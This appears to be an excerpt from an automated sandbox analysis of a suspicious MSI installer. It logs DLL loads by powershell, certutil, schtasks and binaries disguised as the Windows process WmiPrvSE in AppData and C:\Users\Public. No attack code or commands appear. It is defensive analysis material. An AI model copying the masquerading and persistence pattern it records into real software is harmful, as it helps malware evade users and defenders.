                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: pcacli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\Desktop\Desktop.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: certcli.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: cabinet.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: cryptui.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: ncrypt.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: netapi32.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: ntdsapi.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: version.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: secur32.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: certca.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: samcli.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: logoncli.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: dsrole.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: ntasn1.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: uxtheme.dll
                Source: C:\Windows\System32\certutil.exeSection loaded: profapi.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: apphelp.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: wininet.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: cryptsp.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: rsaenh.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: cryptbase.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: sspicli.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: mswsock.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: iertutil.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: windows.storage.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: wldp.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: profapi.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: winhttp.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: iphlpapi.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: winnsi.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: urlmon.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: srvcli.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: netutils.dll
                Source: C:\Users\Public\WmiPrvSE.exeSection loaded: schannel.dll
                Source: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32Jump to behavior
                Source: C:\Windows\SysWOW64\msiexec.exeFile written: C:\Users\user\AppData\Roaming\WmiPrvSE\WmiPrvSE\prerequisites\aipackagechainer.iniJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                Source: 1eSOBjseu2.msiStatic file information: File size 3488768 > 1048576
                Source: Binary string: b.pdb>w source: powershell.exe, 0000000D.00000002.1527530521.000000000279D000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\aipackagechainer.pdb source: aipackagechainer.exe, 00000004.00000002.1443971175.00000000000FE000.00000002.00000001.01000000.00000003.sdmp, aipackagechainer.exe, 00000004.00000000.1428985582.00000000000FE000.00000002.00000001.01000000.00000003.sdmp, 1eSOBjseu2.msi, aipackagechainer.exe.3.dr, 643ea8.msi.2.dr, 643eab.msi.2.dr
